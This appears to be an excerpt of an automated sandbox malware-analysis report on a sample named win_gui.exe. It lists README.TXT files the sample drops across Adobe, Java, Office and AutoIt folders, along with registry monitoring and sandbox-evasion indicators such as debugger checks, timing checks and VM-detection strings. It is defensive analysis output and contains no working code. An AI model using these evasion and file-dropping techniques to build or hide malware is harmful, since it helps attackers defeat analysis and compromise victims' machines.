Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Air\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Assets\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Javascripts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\ngl_resources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins3d\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RdrApp\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Sequences\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Tracker\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\client\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\dtplugin\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\bin\plugin2\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\javafx\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\legal\jdk\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\applet\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\cmm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\deploy\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\ext\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\i386\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\images\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\jfr\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\management\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\java\jre-1.8\lib\security\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Colors\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Effects\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Document Themes 16\Theme Fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\PUB60COR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\CLIPART\Publisher\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Integration\Addons\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Stationery\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\1036\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\3082\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AccessWeb\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\1033\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Templates\Presentation Designs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Common AppData\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\Fonts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX64\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesCommonX86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX64\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\ProgramFilesX86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\System\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\vfs\SystemX86\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Apply\FilesInUse\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ACCWIZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ADDINS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\Download\PackageFiles\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\Updates\ConfigFolders\BBF7ACC0-31FF-4C15-B05C-7341014DF78A\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\AugLoop\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Bibliography\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\BORDERS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Configuration\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\CONVERT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\DCF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Document Parts\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FloodgateExperiences\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FORMS\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f14\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f2\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f33\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f4\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_f7\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000006\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000008\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000009\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000011\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000050\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000055\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_FA000000064\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\FPA_w1\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Library\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCard\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LivePersonaCardRollback\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\LogoImages\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\Media\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\msipc\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Advanced\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\GUI\Simple\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\ODBC Drivers\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\Crimson\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\Notepad++\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\PSPad\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Extras\Editors\TextPad\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OneNote\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\osfFPA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\autoit3\Examples\Helpfile\Extras\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookAutoDiscover\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\OutlookReactNative\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PAGESIZE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PersonaSpy\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PROOF\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PUBBA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\PUBWIZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\QUERIES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\SAMPLES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\sdxs\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\SkypeSrv\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\STARTUP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\TextInputIntelligence\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files (x86)\microsoft office\root\Office16\XLSTART\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\TypeSupport\Unicode\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Resource\Font\Pfm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\locales\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\swiftshader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocSettings\Redaction\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\DocTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\HostedServicesTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\IDTemplates\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\locales\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\swiftshader\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ar_AE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\cs_CZ\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\da_DK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\de_DE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\el_GR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ENU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_AE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_GB\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_IL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\en_US\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\es_ES\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fi_FI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_FR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\fr_MA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\he_IL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\hu_HU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\it_IT\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ja_JP\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ko_KR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nb_NO\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\nl_NL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pl_PL\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\pt_BR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\ru_RU\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sk_SK\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sl_SI\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\sv_SE\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\tr_TR\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\uk_UA\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_CN\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Legal\zh_TW\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Locale\en_US\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\AcroForm\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\README.TXTJump to behavior
Source: C:\Users\user\Desktop\win_gui.exe.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\Desktop\win_gui.exe.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\win_gui.exe.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\win_gui.exe.exe Evasive API call chain: GetLocaleInfo, StrStr, ExitProcess graph_0-72517
Source: C:\Users\user\Desktop\win_gui.exe.exe Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess graph_0-72428
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005C7BE8 rdtsc 0_2_005C7BE8
Source: C:\Users\user\Desktop\win_gui.exe.exe Window / User API: threadDelayed 8189
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005C812D InterlockedIncrement,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,lstrcmpW,Sleep,FindNextFileW,FindClose,InterlockedDecrement,Sleep,Sleep, 0_2_005C812D
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005C9F53 FindFirstFileW,FindClose, 0_2_005C9F53
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_00675337 FindFirstFileExA, 0_2_00675337
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005C9585 GetEnvironmentVariableW,lstrcpyW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,CreateDirectoryW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,GetModuleFileNameW,CopyFileW,GetCommandLineW,CommandLineToArgvW,lstrlenW,CreateProcessW,ExitProcess, 0_2_005C9585
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005CA715 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,lstrlenW,lstrlenW, 0_2_005CA715
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005C8C94 GetSystemInfo,CreateThread,CreateThread, 0_2_005C8C94
Source: win_gui.exe.exe, 00000000.00000003.2036416094.000000000161D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
Source: win_gui.exe.exe, 00000000.00000003.2076933486.0000000001666000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481316695.000000000158E000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000002.4481554175.0000000001666000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000003.2438730506.0000000001666000.00000004.00000020.00020000.00000000.sdmp, win_gui.exe.exe, 00000000.00000003.2450063743.0000000001666000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\win_gui.exe.exe API call chain: ExitProcess graph end node graph_0-72433
Source: C:\Users\user\Desktop\win_gui.exe.exe API call chain: ExitProcess graph end node graph_0-72524
Source: C:\Users\user\Desktop\win_gui.exe.exe API call chain: ExitProcess graph end node graph_0-72521
Source: C:\Users\user\Desktop\win_gui.exe.exe API call chain: ExitProcess graph end node graph_0-72538
Source: C:\Users\user\Desktop\win_gui.exe.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005C7BE8 rdtsc 0_2_005C7BE8
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005D2521 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005D2521
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005CA0B9 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetProcessId,GetEnvironmentVariableW,FreeLibrary, 0_2_005CA0B9
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_00668E2A mov eax, dword ptr fs:[00000030h] 0_2_00668E2A
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005C55DF GetProcessHeap,MultiByteToWideChar,WSAStartup,GetComputerNameW,InitializeCriticalSection,CreateMutexA,WaitForSingleObject,ExitProcess,Sleep,Sleep,Sleep,GetMessageW,TranslateMessage,DispatchMessageW,GetMessageW, 0_2_005C55DF
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005D2521 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_005D2521
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005D26B5 SetUnhandledExceptionFilter, 0_2_005D26B5
Source: C:\Users\user\Desktop\win_gui.exe.exe Code function: 0_2_005D29CF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_005D29CF
